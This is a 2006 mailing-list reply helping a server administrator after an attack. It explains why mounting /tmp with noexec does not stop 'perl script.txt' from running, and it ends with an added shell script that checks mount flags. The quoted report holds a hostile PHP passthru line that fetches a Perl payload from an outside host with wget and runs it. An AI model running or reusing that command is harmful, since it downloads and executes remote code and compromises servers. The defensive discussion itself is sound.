On Saturday 09 September 2006 16:44, Darrell D. Mobley wrote:
> passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
> [::snip::]
> The v6.txt is a Perl script that installs some IRC software and monitors
> IRC on open ports. I do not think the script was successful in running,
> but I just want to make sure the /TMP security is enabled where files can't
> be run there. While I don't think the DDOS attack was successful in
> running the script, it was successful in shutting down the server due to
> MySQL becoming overwhelmed. Server load was up to 156!
>
> Any suggestions would be appreciated.

Having /tmp flags of noexec,nosuid helps against the clueless script kiddies, but in your case it wouldn't prevent the code in v6.txt from being executed.

One example:

[root tmp]# mount | grep /tmp
/home/dev/tmpMnt on /home/tmp type ext2 (rw,noexec,nosuid,loop=/dev/loop0)
[root tmp]# pwd
/home/tmp
[root tmp]# ls -l hi.pl
-rw-r--r-- 1 root root 40 Sep 12 15:02 hi.pl
[root tmp]# cat hi.pl
#!/usr/bin/perl
print "Hello World!\n";
[root tmp]# perl hi.pl
Hello World!
[root tmp]#

My /tmp has noexec and yet I'm still able to execute the perl script. This is because the perl program is being executed (from /usr/bin/perl) and it's interpreting the commands in the hi.pl file. If I were to make hi.pl executable and try to execute that file directly, it would be denied.

[root tmp]# chmod 755 hi.pl
[root tmp]# ls -l hi.pl
-rwxr-xr-x 1 root root 40 Sep 12 15:02 hi.pl
[root tmp]# ./hi.pl
sh: ./hi.pl: Permission denied
[root tmp]#

Hopefully this helps you understand a little more about the capabilities and limitations of the noexec flag on a mounted partition.

Kevin Bonner
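A way to check which scratch directories actually carry the noexec and nosuid flags discussed in the reply above, as an added example that is not part of the original thread. The function names and the sample mount table are assumptions constructed for illustration; an "ok" result only means direct execution is blocked, since `perl hi.pl` still runs as the reply shows.

```shell
# Added example: list hardening flags missing from the mount that holds a path.
# Table format is /proc/mounts (device mountpoint fstype options dump pass).

# Constructed sample table, not taken from any real host.
sample_mounts() {
    cat <<'EOF'
/dev/sda1 / ext4 rw,relatime 0 0
/dev/loop0 /tmp ext2 rw,nosuid,noexec 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
EOF
}

# mount_opts PATH MOUNTS_FILE -> options of the deepest mount covering PATH
mount_opts() {
    awk -v p="$1" '
        {
            mp = $2
            # Covers p if it is "/", equals p, or is a directory prefix of p.
            if (mp == "/" || p == mp || index(p, mp "/") == 1)
                # >= so a later mount on the same point shadows an earlier one
                if (length(mp) >= best) { best = length(mp); opts = $4 }
        }
        END { print opts }
    ' "$2"
}

# missing_flags PATH MOUNTS_FILE -> flags from the post absent on that mount
missing_flags() {
    opts=$(mount_opts "$1" "$2")
    out=""
    for f in noexec nosuid; do
        case ",$opts," in
            *",$f,"*) ;;
            *) out="$out $f" ;;
        esac
    done
    echo "${out# }"
}

# audit_tmp MOUNTS_FILE -> one line per world-writable scratch directory
audit_tmp() {
    for d in /tmp /var/tmp /dev/shm; do
        m=$(missing_flags "$d" "$1")
        if [ -z "$m" ]; then echo "$d ok"; else echo "$d missing: $m"; fi
    done
}

# Demo on the constructed table; on a live host run: audit_tmp /proc/mounts
t=$(mktemp) && sample_mounts > "$t" && audit_tmp "$t"; rm -f "$t"
```

In the sample table /var/tmp has no mount of its own, so it inherits the root filesystem's options and is reported as missing both flags.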